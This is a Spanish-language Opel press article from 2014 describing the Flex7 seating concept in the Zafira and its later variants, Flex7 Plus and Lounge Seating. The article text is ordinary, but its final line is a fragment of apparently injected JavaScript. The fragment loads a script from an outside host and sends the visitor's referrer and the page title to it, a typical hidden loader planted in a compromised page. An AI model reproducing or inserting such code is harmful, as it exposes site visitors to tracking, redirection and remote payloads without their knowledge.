
Myopel.es entra en 2014 con más usuarios y funcionalidades
22 enero, 2014
Opel muestra el ADAM personalizado por Bryan Adams
27 enero, 2014En 1999, el monovolumen Zafira estableció la referencia de la flexibilidad completamente integrada a bordo con el lanzamiento de la exclusiva formula Flex7. El sofisticado concepto de asientos comenzó su camino hacia el éxito desde el inicio de la producción Zafira, y se mejoró en detalle cuando llegó en 2005 el modelo de nueva generación. El éxito no tardó en llegar. El pionero Zafira fue premiado con el “Golden Steering Wheel – Volante de Oro” en su primer año de ventas. Más de 2.200.000 Zafiras de la primera y la segunda generación se han vendido hasta la llegada del Zafira Tourer, el “salón sobre ruedas”, que fue lanzado en 2011, ofreciendo una mezcla perfecta entre funcionalidad y confort.
Zafira – el pionero de los monovolúmenes compactos de siete plazas
La exitosa fórmula Flex7 es esencialmente la misma hoy que la que fue en 1999: La máxima flexibilidad a bordo sin necesidad de quitar los asientos. Desde la primera generación del Zafira, la tercera fila de asientos puede plegarse hacia abajo, de forma individual o conjuntamente, a ras con el piso del maletero. Para lograr un impresionante volumen de carga máxima de 1.700 litros, el conductor entonces sólo tenía que plegar los asientos y respaldos de la fila del medio antes de plegarlos contra los respaldos de la primera fila. En sólo 15 segundos, el Zafira podía transformarse de un siete plazas a un biplaza. «Queríamos que todo fuera lo más fácil posible y sin esfuerzo», dice Frank Leopold, Gerente de Grupo de Ingeniería e Innovación, el «padre» del concepto Flex7. «Como cliente típico, nos imaginamos a una madre sosteniendo a su hijo y al tiempo teniendo que cambiar la configuración de asientos. Ningún competidor fue capaz de ofrecer una flexibilidad comparable. De repente, incluso los grandes desplazamientos paran hacer compras pueden ser una experiencia relajada, ya que no hay que preocuparse de como encajar todo en el coche». Y gracias a la elevada posición del asiento y generoso espacio para sentarse, conducir el Zafira era igualmente relajante.
Con la llegada del Flex7, la época de tener que quitar y cargar con pesados asientos para obtener más espacio, se había terminado con Opel – incluso hoy en día, 15 años más tarde, los competidores no ofrecen frecuentemente sistemas similares.
Zafira Family y Zafira Tourer – la pareja de éxito para cualquier necesidad
Para la segunda generación del Zafira en 2005, los ingenieros de Opel optimizaron el manejo de la segunda fila de asientos para que pudieran ser abatidos en secciones 40:20:40, permitiendo un confortable acomodo de adultos en los asientos individuales exteriores. Luego, en 2011, la introducción del sistema Flex7 Plus hizo del nuevo Zafira Tourer el definitivo “maestro de la flexibilidad”. Mientras que la tercera fila de asientos se mantiene abatible quedando enrasada con el suelo del maletero, la segunda fila fue completamente rediseñada. Ya no había un asiento corrido, sino que ahora consistía en tres asientos individuales que podían ser plegados individualmente, creando de esta forma un espacio completamente plano aún más grande. Los tres asientos estaban también diseñados para poderse desplazar horizontalmente hasta 210 mm cada uno de ellos independientemente. Con la segunda fila de asientos plegada, el volumen máximo de carga se ampliaba ahora hasta los 1.860 litros. “Con este interior flexible, el Zafira Tourer es también ideal para viajes de trabajo, siendo mucho más que un monovolumen familiar”, dice Leopold.
Viaje en “primera clase” en el “salón sobre ruedas”
Lo más destacado del Zafira Tourer sigue siendo su sistema Lounge Seating, que ofrece a los pasajeros de la segunda fila de asientos un generoso espacio comparable a un sedán de clase alta. Un inteligente y sencillo mecanismo de plegado / rotación transforma el asiento central de la parte trasera en un cómodo reposabrazos para los pasajeros en los asientos laterales, que pueden deslizarse hasta 280 mm hacia atrás – dando el mejor valor de su clase en espacio para las piernas. Los asientos también pueden deslizarse 50 mm hacia el centro del habitáculo, una verdadera novedad en el segmento permitiendo un generoso espacio a la altura de los hombros.
Concepto Flex: receta para el éxito en otros modelos Opel
Desde la llegada de sistema de asientos Flex7 en 1999, una serie de conceptos flexibles de interior también se han integrado en otros modelos de Opel. El concepto de asientos FlexSpace, FlexDoor y la consola central FlexRail en el Opel Meriva, así como el sistema integrado de transporte de bicicletas FlexFix y el respaldo del asiento trasero FlexFold en el Astra Sports Tourer, todos tienen sus raíces en el sistema Flex7 del primer Opel Zafira. «Nuestro objetivo era ofrecer innovaciones que se ajusten a cada modelo – ya sean para la salud de la espalda, para las familias, o para una actualización del vehículo», dice Leopold.
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;